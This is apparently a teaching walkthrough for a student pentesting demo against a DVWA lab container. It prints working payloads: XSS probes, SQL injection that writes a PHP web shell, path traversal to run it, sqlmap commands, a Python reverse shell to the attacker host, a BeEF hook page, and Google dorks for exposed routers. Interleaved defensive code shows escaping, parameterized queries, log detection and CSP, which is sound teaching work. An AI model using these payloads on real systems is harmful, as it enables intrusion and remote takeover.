This is a simple security / pentesting demo run for Abakus at NTNU in Trondheim. There are two hosts used in this demo:
Victim (Ubuntu 16.04): 192.168.56.101
Attacker (Kali Linux): 192.168.56.102
To adapt this demo to your own setup, simply change those IPs in the examples.
DO NOT use the techniques shown here towards live targets on the internet, your friends, or school resources. Doing so is most likely against the law and is simply not cool, always ask for explicit permission before attempting any form of pentesting!
This was done on an Ubuntu 16.04 server.
```
$ sudo apt-get update && sudo apt-get install docker.io
$ sudo systemctl start docker
```
Pull the image from DockerHub:
```
$ sudo docker pull citizenstig/dvwa
```
Fire up the container:
```
$ sudo docker run -d -p 80:80 citizenstig/dvwa:latest
```
- DVWA is now available at http://192.168.56.101:80
- Follow the instructions to set up the MySQL database within the browser
- Refresh and log in; the default username is `admin` and the default password is `password`
Popular search operators: `site`, `filetype`, `inurl`, `intitle`
Database of search queries for hacking: Google Hacking DB
Find hardware with known vulnerabilities:
```
intitle:"SpeedStream Router Management Interface"
```
Web-accessible, open Cisco routers:
```
inurl:"level/15/exec/-/show"
```
Installation instructions: https://github.com/laramies/theHarvester
Example command for gathering e-mail addresses, hosts and subnames for a domain from all supported sources:
```
theharvester -d megacorpone.com -l 500 -b all > megacorpone.txt
```
Scanning the victim's machine with Nmap (service/version detection, default scripts and OS detection):
```
sudo nmap 192.168.56.101 -sV -sC -O
```
- Go to http://192.168.56.101/security.php and set the security level to low.
- Go to http://192.168.56.101/vulnerabilities/xss_r/ and explore the functionality.
- Reflect on the source code by clicking "View Source" in the bottom right.
- Play around with some input: does the application reflect `<`, `'`, `"`?
- Can you put actual HTML tags in there, like `<pre>`, `<a>`?
- Attempt to use the classic `<script>alert(1)</script>` to check for XSS.
- Show the same with the persistent/stored XSS at http://192.168.56.101/vulnerabilities/xss_s/
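To make the reflection step concrete from the defender's side, here is an added example (not DVWA's code, which is PHP) that mimics the low-security reflection of the "name" parameter next to the hardened form. The probe list is constructed from the characters and tags the demo tries; `html.escape` with `quote=True` encodes `&`, `<`, `>`, `"` and `'`, which is exactly what turns `<script>alert(1)</script>` back into inert text. The attribute-context renderer shows that escaping alone is not enough there: the attribute value must also be quoted.

```python
import html

# Constructed probe inputs, matching the characters and tags the demo tries
# (these are this example's assumptions, not DVWA data).
PROBES = ["<", "'", '"', "<pre>hi</pre>", "<a>x</a>", "<script>alert(1)</script>"]


def render_vulnerable(name):
    """Mimics the low-security DVWA reflection: the parameter is pasted
    straight into the HTML, so any markup in it becomes part of the page."""
    return "<pre>Hello " + name + "</pre>"


def render_escaped(name):
    """Hardened form: encode the five HTML-significant characters (& < > " ')
    so the browser treats the input as text, whatever it contains."""
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"


def render_in_attribute(value):
    """Attribute context: the same escaping, but the attribute must also be
    quoted, otherwise a value containing a space still breaks out of it."""
    return '<input type="text" name="name" value="' + html.escape(value, quote=True) + '">'


def probe_results():
    """Run every probe through both renderers; returns {probe: (vulnerable, escaped)}."""
    return {p: (render_vulnerable(p), render_escaped(p)) for p in PROBES}


if __name__ == "__main__":
    for probe, (vuln, safe) in probe_results().items():
        print("input: %r" % probe)
        print("  vulnerable: " + vuln)
        print("  escaped:    " + safe)
```

Running it prints each probe twice: the vulnerable renderer hands the `<script>` tag to the browser unchanged, the escaped one emits `&lt;script&gt;` which renders as literal text. Encoding has to match the context the value lands in (HTML body, attribute, JavaScript, URL), which is the point the OWASP XSS prevention cheat sheet linked at the end makes at length.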
- Go to http://192.168.56.101/security.php and set the security level to low.
- Go to http://192.168.56.101/vulnerabilities/sqli/ and explore the functionality.
- View the source by clicking "View Source" in the bottom right.
- Input a single quote `'` into the input field. Makes the query:
  ```
  "SELECT first_name, last_name FROM users WHERE user_id = '''";
  ```
- Input `1' OR 1=1;#` into the input field. Makes the query:
  ```
  "SELECT first_name, last_name FROM users WHERE user_id = '1' OR 1=1;#'";
  ```
- Demonstrate that arbitrary information can be retrieved:
  ```
  1' union select all 1,@@version;#
  1' union select all 1,table_name FROM information_schema.tables;#
  ```
- Show that files can be written as well:
  ```
  1' union select all 1,"<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/tmp/backdoor.php';#
  ```
- Take advantage of it with the path traversal vulnerability:
  ```
  http://192.168.56.101/vulnerabilities/fi/?page=../../../../../tmp/backdoor.php&cmd=id
  ```
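The two queries above show why string concatenation is the root cause; the fix is to keep the value out of the SQL text entirely. The following is an added example, not DVWA's PHP, that builds an in-memory SQLite copy of a `users` table (sqlite stands in for MySQL; the rows are constructed) and runs the demo's lookup both ways. Because `#` comments are MySQL-specific, the tautology is written as `1' OR '1'='1` here, which behaves the same in both engines. The last function covers the `?page=` parameter from the traversal step: it resolves the requested page under an assumed include directory and refuses anything that ends up outside it, including `../../../../../tmp/backdoor.php`.

```python
import os
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the demo's users table (not DVWA data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """String-concatenated query, the exact shape the demo's source shows."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value travels separately from the SQL text, so
    quotes and operators inside it are data, never syntax."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def lookup_raises(conn, user_id):
    """True if the concatenated query is no longer valid SQL, which is what the
    demo's single-quote probe relies on to spot the injection point."""
    try:
        lookup_vulnerable(conn, user_id)
        return False
    except sqlite3.Error:
        return True


# Assumed include directory for the ?page= parameter (not a DVWA path).
PAGES_DIR = "/var/www/html/vulnerabilities/fi"


def resolve_page(page, base=PAGES_DIR):
    """Absolute path to include, or None if the requested page would escape the
    include directory. Handles ../ sequences and absolute paths alike, because
    realpath() is applied after joining and the result is compared to the base."""
    base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    conn = make_db()
    for probe in ["1", "'", "1' OR '1'='1"]:
        print("input %-16r concatenated: %s" % (probe, "error" if lookup_raises(conn, probe) else lookup_vulnerable(conn, probe)))
        print("%-22s parameterized: %s" % ("", lookup_parameterized(conn, probe)))
    print(resolve_page("include.php"), resolve_page("../../../../../tmp/backdoor.php"))
```

The parameterized lookup returns one row for `1`, nothing for the tautology and nothing for the lone quote; the concatenated one returns every row for the tautology and throws a syntax error for the quote. An allowlist of page names is an even stricter option for the include case, but the realpath-and-prefix check is the general form when the set of files is not fixed.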
- Run `sqlmap -u "http://192.168.56.101/vulnerabilities/sqli/?id=123&Submit=Submit#"`.
- Fetch the cookie values from CookieManager+.
- Run `sqlmap -u "http://192.168.56.101/vulnerabilities/sqli/?id=123&Submit=Submit#" --cookie="security=low; PHPSESSID=[SESSION FROM COOKIES]"`
- Run `sqlmap -u "http://192.168.56.101/vulnerabilities/sqli/?id=123&Submit=Submit#" --cookie="security=low; PHPSESSID=[SESSION FROM COOKIES]" --tables`
- We want to take advantage of the SQLi and the path traversal vulnerability we found previously.
- Reflect on why we'd want to use a reverse shell (victim -> attacker) instead of a regular shell (attacker -> victim).
- Prepare to receive the shell with a netcat listener on the attacker machine:
  ```
  nc -l -p 5454
  ```
- Confirm that python is available on the victim:
  ```
  http://192.168.56.101/vulnerabilities/fi/?page=../../../../../tmp/backdoor.php&cmd=which python
  ```
- We'll get the reverse shell using the following Python one-liner (generic form with the placeholder address 10.0.0.1:1234; the attacker's address and port are substituted in the next step):
  ```
  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  ```
- Execute the reverse shell on the victim:
  ```
  http://192.168.56.101/vulnerabilities/fi/?page=../../../../../tmp/backdoor.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5454));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  ```
- Shell, woo!
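Every request in this chain goes through the victim's web server, so the whole thing is visible in its access log. As an added example from the detection side (not part of the original demo), the block below parses Apache combined-format lines and flags requests whose query string contains a traversal sequence, after URL-decoding, or carries a command parameter that the file-inclusion page never legitimately receives. The log lines are constructed for this example and mirror the `?page=...&cmd=...` requests above; the parameter names in `COMMAND_PARAMS` are an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache "combined"-format access-log lines for the victim, written
# for this example (not real captured traffic).  The last two mirror the demo's
# traversal + command-execution requests; the first two are ordinary use.
SAMPLE_LOG = """\
192.168.56.102 - - [10/Mar/2018:12:00:01 +0100] "GET /vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Mar/2018:12:00:05 +0100] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Mar/2018:12:00:09 +0100] "GET /vulnerabilities/fi/?page=../../../../../tmp/backdoor.php&cmd=id HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Mar/2018:12:00:15 +0100] "GET /vulnerabilities/fi/?page=..%2F..%2F..%2F..%2F..%2Ftmp%2Fbackdoor.php&cmd=which%20python HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Query parameters the file-inclusion page has no business receiving; the names
# are an assumption for this example, extend them for your own application.
COMMAND_PARAMS = {"cmd", "exec", "command"}


def analyse_request(target):
    """Return the list of reasons a request target matches the demo's attack chain
    (empty list for a benign request)."""
    reasons = []
    url = urlparse(target)
    # Decode twice so single- and double-encoded traversal sequences both surface as ../
    decoded_query = unquote(unquote(url.query))
    if "../" in decoded_query or "..\\" in decoded_query:
        reasons.append("path traversal in query string")
    for name in parse_qs(url.query, keep_blank_values=True):
        if name.lower() in COMMAND_PARAMS:
            reasons.append("command parameter '%s'" % name)
    return reasons


def scan_log(text):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line: skip it rather than abort the scan
        reasons = analyse_request(match["target"])
        if reasons:
            findings.append({
                "ip": match["ip"], "time": match["ts"], "status": int(match["status"]),
                "target": match["target"], "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["target"], "->", "; ".join(f["reasons"]))
```

On the sample it reports the two backdoor requests and stays quiet on the ordinary ones; the double `unquote` is what catches the percent-encoded variant, which a naive `../` substring match on the raw line would miss. In a real deployment the same logic belongs in the web server's log pipeline, and a 200 on a request like this is the cue to look at what the PHP process spawned (the `python` child from the one-liner above is the tell on the host side).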
- Fire up BeEF in Kali:
  ```
  root@kali:~# beef-xss
  ```
- Open the BeEF GUI at http://192.168.56.102:3000/ui/panel and log in with the credentials beef:beef
- Host a simple HTML page with the following content:
  ```
  root@kali:/var/www/html# cat beef.html
  <html>
  <head>
  <script src="http://192.168.56.102:3000/hook.js"></script>
  </head>
  <body>
  <h1>Welcome to my awesome page</h1>
  <h2>Enjoy your stay!</h2>
  </body>
  </html>
  ```
- Get hooked by going to http://192.168.56.102/beef.html (served by Apache from /var/www/html on the attacker box) in a browser of your choosing
- Show some functionality by selecting Hooked Browsers -> Commands -> Browser -> Hooked Domain -> Create Alert Dialog
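The hook is nothing more than a `<script src=...>` pointing at a foreign origin, which is exactly what the stored XSS earlier lets someone plant on the victim's pages. A Content-Security-Policy header with `script-src 'self'` on the victim's site makes the browser refuse that load. The block below is an added example (not BeEF's or DVWA's code) of a deliberately simplified CSP matcher: it understands `'self'`, `'none'`, `*` and exact host sources, and treats nonces, hashes, scheme-only and wildcard-host sources as unmatched. The policy string and page URL in the usage are assumptions for the example.

```python
from urllib.parse import urlparse

DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_policy(csp):
    """Split a Content-Security-Policy header value into {directive: [sources]}."""
    policy = {}
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def origin(url, default_scheme="http"):
    """(scheme, host, port) for a full URL or a CSP host-source such as cdn.example.com:3000.
    A missing port is filled in from the scheme, as CSP matching requires."""
    parsed = urlparse(url if "://" in url else "//" + url, scheme=default_scheme)
    port = parsed.port if parsed.port is not None else DEFAULT_PORTS.get(parsed.scheme)
    return (parsed.scheme, parsed.hostname, port)


def csp_allows_script(csp, page_url, script_url):
    """Simplified CSP check: may a <script src=script_url> on page_url load?
    script-src is consulted first, default-src as the fallback; with neither
    present the browser applies no restriction."""
    policy = parse_policy(csp)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True
    page = origin(page_url)
    script = origin(script_url)
    for src in sources:
        if src == "'self'":
            if script == page:
                return True
        elif src == "*":
            return True
        elif src.startswith("'") or src.endswith(":"):
            continue  # 'none', nonces, hashes and scheme-only sources: not matched here
        elif script == origin(src, default_scheme=page[0]):
            return True
    return False


if __name__ == "__main__":
    # Assumed policy on the victim's site and an assumed page URL (example values).
    policy = "default-src 'self'; script-src 'self' cdn.example.com"
    page = "http://192.168.56.101/vulnerabilities/xss_s/"
    for script in ["http://192.168.56.102:3000/hook.js", "http://192.168.56.101/dvwa/js/dvwaPage.js"]:
        print(script, "->", "allowed" if csp_allows_script(policy, page, script) else "blocked")
```

With that policy the hook on 192.168.56.102:3000 is blocked while the site's own script on 192.168.56.101 loads; an allowlisted host on a non-default port is blocked too, because a host source without a port only matches the scheme's default port. Note this only helps if the policy also rules out inline scripts, since the demo's `<script>alert(1)</script>` payload has no `src` at all; that is what the `'unsafe-inline'` keyword (absent here) controls.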
- Damn Vulnerable Web Application: http://www.dvwa.co.uk/
- WebGoat: https://github.com/WebGoat/WebGoat
- Mutillidae 2: https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project
- XSS: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
- SQL injection: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
- Hacker101 - Video Resources: https://www.hacker101.com/